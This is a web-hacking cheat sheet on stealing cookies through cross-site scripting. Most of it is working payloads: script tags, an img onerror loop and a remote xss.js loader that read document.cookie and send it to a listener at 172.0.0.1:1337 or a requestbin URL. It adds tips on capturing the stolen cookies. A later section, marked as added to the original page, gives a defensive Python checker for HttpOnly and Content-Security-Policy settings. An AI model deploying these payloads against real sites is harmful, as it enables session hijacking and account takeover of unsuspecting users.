
# Stealing Cookies

Stealing cookies to obtain another user's privileges is the fever dream of hackers looking to exploit cross-site scripting vulnerabilities. Every payload below reads `document.cookie`, which only exposes cookies that were set without the `HttpOnly` flag.

### Payloads

#### Verification with alert()

This payload will pop an `alert()` box before sending the cookie. This can be useful for testing a cross-site scripting payload and verifying that it is grabbing the intended information. Once the `alert()` box closes, the cookie is sent to the listening server:

```html
<script>
alert(document.cookie);
var i=new Image;
i.src="http://172.0.0.1:1337/?"+document.cookie;
</script>
```

#### Exfiltrating cookies without alert()

After verifying that the parameter is susceptible to cross-site scripting, we can leverage the following payload to exfiltrate cookies silently:

```html
<script>var i=new Image;i.src="http://172.0.0.1:1337/?"+document.cookie;</script>
```

#### CTF Only Payload

The following payload leverages the `img` tag rather than `script` and will call `onerror()` in a loop, ultimately filling up your server with cookies. I have found this can be life-saving in a CTF when things may not be working as the author originally intended:

```html
<img src=x onerror=this.src='http://172.0.0.1:1337/?'+document.cookie;>
```

#### My Preferred Method

The way that I like to go about capturing cookies is submitting the following payload, calling back to a JavaScript file that I host on a Python web server:

```html
<script src="http://172.0.0.1/xss.js"></script>
"><script src=http://172.0.0.1/xss.js></script>
```

The `xss.js` file looks like the following; ultimately it does the same as the payloads above, grabbing the cookies and sending them to my hosted web server:

```javascript
// Creates an image element whose src carries the cookie string; the browser
// issues the request to the listener as soon as the element is attached.
function pwn() {
    var img = document.createElement("img");
    img.src = "http://172.0.0.1/xss?=" + document.cookie;
    document.body.appendChild(img);
}
pwn();
```

### Capturing the Cookies

Unless you're in a CTF environment, I would highly recommend capturing the cookies on a local web server or a controlled Burp Collaborator instance. I'm not sure about you, but sending cookies to a random website seems like a bad idea to me. That being said, there are sites that exist, such as `requestbin`, to send the request to:

```text
http://172.0.0.1:1337/<script>new Image().src="http://requestbin.net/r/mybin?c="+document.cookie;</script>
```
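As an added defensive check (not part of the original page): the payloads above only succeed when the session cookie is readable through `document.cookie` (set without `HttpOnly`) and the application's Content-Security-Policy does not block the image beacon or the remote `xss.js` load to the listener origin. The script below takes an application's response headers and reports which of those conditions hold; the listener origin, the `app.example` site origin and the header values are constructed, and the CSP matcher is a deliberately minimal one that treats an absent port as the scheme's default.

```python
from http.cookies import SimpleCookie
from urllib.parse import urlsplit

LISTENER = "http://172.0.0.1:1337"   # listener origin from the payloads above (constructed)
SITE = "https://app.example"         # hypothetical origin of the vulnerable application

def cookies_exposed_to_js(set_cookie_values):
    """Names of cookies document.cookie can read: those set without HttpOnly."""
    exposed = []
    for value in set_cookie_values:
        jar = SimpleCookie()
        jar.load(value)
        exposed += [name for name, m in jar.items() if not m["httponly"]]
    return exposed

def _source_allows(source, origin, site):
    """Minimal CSP source-expression match; absent ports are treated as defaults."""
    if source == "*":
        return True
    if source == "'self'":
        return origin == site
    if source.startswith("'"):          # 'none', 'unsafe-inline', nonces, hashes
        return False
    if source.endswith(":"):            # scheme source such as "https:"
        return origin.startswith(source)
    want, have = urlsplit(origin), urlsplit(source if "://" in source else "//" + source)
    if have.scheme and have.scheme != want.scheme:
        return False
    host = have.hostname or ""
    host_ok = want.hostname == host or (host.startswith("*.") and want.hostname.endswith(host[1:]))
    return host_ok and have.port == want.port

def csp_allows(csp, directive, origin, site=SITE):
    """True if the policy lets `directive` load from `origin` (default-src fallback)."""
    policy = {}
    for part in csp.split(";"):
        tokens = part.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    sources = policy.get(directive, policy.get("default-src"))
    return sources is None or any(_source_allows(s, origin, site) for s in sources)

def assess(response_headers, listener=LISTENER):
    """Report which steps of the cookie-theft payloads the response headers leave open."""
    set_cookies = [v for k, v in response_headers if k.lower() == "set-cookie"]
    csp = next((v for k, v in response_headers if k.lower() == "content-security-policy"), "")
    return {"cookies_readable": cookies_exposed_to_js(set_cookies),
            "image_beacon_allowed": csp_allows(csp, "img-src", listener),
            "remote_script_allowed": csp_allows(csp, "script-src", listener)}
```

A result of `cookies_readable` containing the session cookie name together with `image_beacon_allowed` being true means the silent exfiltration payload would work unchanged; an `HttpOnly` session cookie and an `img-src`/`script-src` restricted to the site's own origins shut both paths.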

### References

- <https://github.com/R0B1NL1N/WebHacking101/blob/master/xss-reflected-steal-cookie.md>
- <https://snowscan.io/htb-writeup-bankrobber/>